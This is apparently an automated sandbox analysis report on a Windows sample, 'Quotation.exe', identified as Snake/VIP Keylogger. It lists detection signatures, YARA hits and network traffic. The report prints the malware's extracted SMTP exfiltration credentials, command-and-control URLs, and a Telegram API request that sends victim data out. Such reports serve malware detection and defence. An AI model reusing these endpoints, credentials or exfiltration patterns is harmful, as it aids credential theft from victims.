Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1527820
MD5:f485d8c73bcc8ac6ab3f432f2258d030
SHA1:7f990d4304126a8d731b0b5a99be8a5dad0d0090
SHA256:7f285582f0f5bcda85cbc485d3e29ff0cc0693f68a6d2be98fac0866b1524f67
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation.exe (PID: 2168 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: F485D8C73BCC8AC6AB3F432F2258D030)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
Quotation.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Quotation.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Quotation.exeJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        Quotation.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Quotation.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dfba:$a1: get_encryptedPassword
          • 0x2e2d7:$a2: get_encryptedUsername
          • 0x2ddca:$a3: get_timePasswordChanged
          • 0x2ded3:$a4: get_passwordField
          • 0x2dfd0:$a5: set_encryptedPassword
          • 0x2f627:$a7: get_logins
          • 0x2f58a:$a10: KeyLoggerEventArgs
          • 0x2f1ef:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2ddba:$a1: get_encryptedPassword
                  • 0x2e0d7:$a2: get_encryptedUsername
                  • 0x2dbca:$a3: get_timePasswordChanged
                  • 0x2dcd3:$a4: get_passwordField
                  • 0x2ddd0:$a5: set_encryptedPassword
                  • 0x2f427:$a7: get_logins
                  • 0x2f38a:$a10: KeyLoggerEventArgs
                  • 0x2efef:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 5 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.Quotation.exe.450000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.Quotation.exe.450000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.Quotation.exe.450000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                        0.0.Quotation.exe.450000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.Quotation.exe.450000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                          • 0x2dfba:$a1: get_encryptedPassword
                          • 0x2e2d7:$a2: get_encryptedUsername
                          • 0x2ddca:$a3: get_timePasswordChanged
                          • 0x2ded3:$a4: get_passwordField
                          • 0x2dfd0:$a5: set_encryptedPassword
                          • 0x2f627:$a7: get_logins
                          • 0x2f58a:$a10: KeyLoggerEventArgs
                          • 0x2f1ef:$a11: KeyLoggerEventArgsEventHandler
                          Click to see the 2 entries

                          System Summary

                          barindex
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 2168, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49727
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-07T10:13:31.432429+020028033053Unknown Traffic192.168.2.849706188.114.96.3443TCP
                          2024-10-07T10:13:35.384647+020028033053Unknown Traffic192.168.2.849712188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-07T10:13:29.091145+020028032742Potentially Bad Traffic192.168.2.849704132.226.247.7380TCP
                          2024-10-07T10:13:30.888015+020028032742Potentially Bad Traffic192.168.2.849704132.226.247.7380TCP
                          2024-10-07T10:13:32.154035+020028032742Potentially Bad Traffic192.168.2.849707132.226.247.7380TCP
                          2024-10-07T10:13:33.450514+020028032742Potentially Bad Traffic192.168.2.849709132.226.247.7380TCP
                          2024-10-07T10:13:34.825502+020028032742Potentially Bad Traffic192.168.2.849711132.226.247.7380TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Quotation.exeAvira: detected
                          Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                          Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                          Source: 0.0.Quotation.exe.450000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
                          Source: Quotation.exeReversingLabs: Detection: 71%
                          Source: Quotation.exeVirustotal: Detection: 70%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: Quotation.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Quotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2
                          Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then jmp 00C2F45Dh0_2_00C2F2C0
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then jmp 00C2F45Dh0_2_00C2F4AC
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then jmp 00C2F45Dh0_2_00C2F52F
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then jmp 00C2FC19h0_2_00C2F961

                          Networking

                          barindex
                          Source: unknownDNS query: name: api.telegram.org
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: CNSV-LLCUS CNSV-LLCUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.247.73:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 132.226.247.73:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 132.226.247.73:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49706 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.96.3:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: mail.electradubai.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 08:13:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                          Source: Quotation.exeString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                          Source: Quotation.exeString found in binary or memory: http://aborters.duckdns.org:8081
                          Source: Quotation.exeString found in binary or memory: http://anotherarmy.dns.army:8081
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: Quotation.exeString found in binary or memory: http://checkip.dyndns.org/q
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.electradubai.com
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: Quotation.exeString found in binary or memory: http://varders.kozow.com:8081
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: Quotation.exeString found in binary or memory: https://api.telegram.org/bot
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: Quotation.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                          Source: Quotation.exe, 00000000.00000002.4104956397.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

                          System Summary

                          barindex
                          Source: Quotation.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Quotation.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: Quotation.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: initial sampleStatic PE information: Filename: Quotation.exe
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_005E743F0_2_005E743F
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_005EC2180_2_005EC218
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_005E55E00_2_005E55E0
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_005E58300_2_005E5830
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_005E39AC0_2_005E39AC
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2A0880_2_00C2A088
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2C1460_2_00C2C146
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2D2780_2_00C2D278
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C253620_2_00C25362
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2C4680_2_00C2C468
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2C7380_2_00C2C738
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2E9880_2_00C2E988
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C269A00_2_00C269A0
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2CA080_2_00C2CA08
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2CCD80_2_00C2CCD8
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C26FC80_2_00C26FC8
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2CFAB0_2_00C2CFAB
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2F9610_2_00C2F961
                          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00C2E97B0_2_00C2E97B
                          Source: Quotation.exe, 00000000.00000000.1633874804.0000000000496000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.exe
                          Source: Quotation.exe, 00000000.00000002.4103434254.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
                          Source: Quotation.exeBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.exe
                          Source: Quotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
